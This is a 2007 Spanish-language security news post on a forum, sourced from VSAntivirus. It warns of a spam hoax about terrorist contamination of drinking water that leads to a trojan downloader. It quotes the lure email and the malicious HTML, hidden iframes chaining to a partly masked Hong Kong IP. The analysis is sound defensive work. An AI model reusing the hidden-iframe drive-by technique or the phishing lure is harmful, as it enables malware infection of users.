Mensaje de "virus terrorista", propaga un troyano

en Noticias de Seguridad Informatica
TU PANEL DE CONTROL:
REGISTRAR
Wilkinsonpc Tienda Productos Servicios Recursos Gratuitos - Gratis Soporte Comunidad
Foros Qubitaria Ayuda de los Foros
Retroceder   Foros Comunidad : Noticias de Actualidad : Noticias de Seguridad Informatica
Noticias de Seguridad Informatica Noticias de Seguridad Informatica Todas las Noticias de Seguridad Informatica. Alertas y fallos de seguridad.

Mensaje de "virus terrorista", propaga un troyano

Compartir

En las últimas horas se ha estado propagando en forma de spam, un mensaje con una noticia falsa (ESPANA VIRUS TERRORISTA EN AGUA POTABLE), pero que puede generar la suficiente curiosidad en los navegantes como para que los mismos terminen haciendo clic en el enlace mostrado.

El texto de la versión más reciente del mencionado mensaje es el siguiente:

De: [una dirección falsa]

Asunto: ESPANA VIRUS TERRORISTA EN AGUA POTABLE

Texto del mensaje:
Virus Intoxica Agua potable en Espana, informamos
a los ciudadanos que no consuman agua ya que contiene
un virus debido a un acto terrorista.
Al momento no sabemos la gravedad del Incidente, si
sabemos que hay infectados por tomar AGUA INFECTADA
CON VIRUS !!
PARA MAS INFORMACION HAGA CLICK EN EL LINK .

http: // geocities.com/[nombre al azar]

Atte.
Ciudadania del Pueblo
Grupo Santander

------------------------------------------------------
Si recibio este mail por equivocacione, por favor
desuscribirse desde el siguiente link
unsubscribe from our mailing list:
http: // geocities.com/[nombre al azar]

Donde [nombre al azar] es una serie de caracteres y números generados al azar. El enlace suele ser siempre diferente.

Si el usuario hace clic en dicho enlace, se abre una página de Geocities conteniendo un iFrame oculto:

<iframe style='visibility: hidden;' width='1' height='1'
src='http: // 58.65.???.106 /1/'></iframe>

La dirección IP (apunta a un equipo ubicado en alguna parte de Hong Kong), contiene a su vez otra página que muestra un mensaje de error falso en su título (500 - Internal Server Error), y sin texto visible. Sin embargo, la página posee un segundo iFrame también oculto, dirigido a una segunda página en dicho servidor, la cuál contiene un código en JavaScript, que desde la base 2170 es detectado por NOD32 como JS/TrojanDownloader.Agent.EE:

<HTML><HEAD>
<TITLE>500 - Internal Server Error</TITLE></HEAD>
<BODY>
</TBODY>
<iFRAME NAME="member" width=0% height=0% scrolling="auto"
SRC="http: // 58.65.???.106 /1/ inde??.php">
</BODY></HTML>

La ejecución de JS/TrojanDownloader.Agent.EE se realiza de forma automática, culminando el proceso que se inició cuando el usuario hizo clic en el primer enlace recibido en el spam antes mencionado.

Si se vuelve a hacer clic sobre el enlace, el sitio rechaza la petición, basado en la dirección IP del usuario, lo que supone que no solo se utiliza un control para evitar una nueva infección, sino que se colecciona la lista de direcciones IP de las víctimas. El mensaje mostrado en ese caso es el siguiente:

Sorry! You IP is blocked.

Si bien lo aquí descrito puede servir de advertencia, recordemos que los escenarios involucrados en este tipo de ataque (textos de los mensajes, enlaces y páginas web, troyanos descargados, etc.), pueden variar fácilmente, y de hecho seguramente lo harán en el transcurso de las próximas horas.

Una vez más, recordamos que la curiosidad siempre juega en nuestra contra, y que hoy más que nunca es imprescindible no hacer clic sobre enlaces de ningún correo que no hayamos solicitado, así como tampoco abrir adjuntos que no hemos pedido, sin que en ningún caso importe en absoluto su remitente.

Por supuesto, esa conducta debe estar complementada con la norma de utilizar siempre un antivirus actualizado, y haber instalado todos los parches publicados por los fabricantes para nuestro sistema operativo y programas utilizados.

Fuente: VSANTIVIRUS
Compartir
  #1  
Creado: 12-Apr-2007, a las 17:26 Vistas: 678
Categoria: Noticias de Seguridad Informatica
Creado por: W-Bot W-Bot está desconectado (18-February-2005 | Colombia | 5.563 Mensajes.)
Respuesta

Etiquetas
mensaje, propaga, virus terrorista


Temas Similares
» Como eliminar Virus que me bloquea "Ejecutar" y "Administrador de Tareas" 0
» Mensaje del antivirus :" Paquete con cabecerra incosistente" 6
» "No recibo correo, o me sale un mensaje de rechazo" 0
» El Mensaje "Estómago Lleno" No Llegan Adecuadamente al Cerebro de las Personas 0
» NO he podido eliminar virus "Downloader.conHook" (Solucionado) 8
» Alemania estudia el uso de virus "troyanos" para combatir los ciberataques 0
» Hoax: "Copa del mundo 2006" (falsa alerta de virus) 0
» Famoso "terrorista informático" enseña trucos contra los hackers 1
» Mops.A. Instala "toolbar" en IE y descarga troyano 0
» ObjID.C. Troyano que usa "HTML Help ActiveX control" 0


Herramientas Buscar en Tema
Buscar en Tema:

Búsqueda Avanzada
Desplegado

Ir al Foro


» ComuniDAD
Inicio
Noticias de Actualidad
Apuntes, Monografias y Tareas
Telefonia, Celulares, TV, GPS, ISP, PDA
Programas Windows, Mac, Linux, etc.
Hardware, Electronica y Redes
Diseño Web y Programacion
Internet y Grandes Portales
Juegos, Consolas y Emuladores
Multimedia, Diseño y Animaciones
Peliculas, Series, Musica, Trailers, Videos, Parodias
Seguridad y Spyware
Salud, Bienestar, Familia y Esparcimiento
Economia, Negocios y Asuntos Legales
Hoteles, Viajes y Turismo
Mundo a Motor [Motos, Autos, etc]
Foros Generales (OFF TOPIC)
Calendario de Eventos
Administracion ComuniDAD



Ultimos Temas


La franja horaria es GMT -5. Ahora son las 00:03.


2010 ©
Powered by : vBulletin® Versión 3.8.8 Copyright ©2000 - 2019, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.2.0
Sitemap 1 - Sitemap 2 - Sitemap 3 - Sitemap 4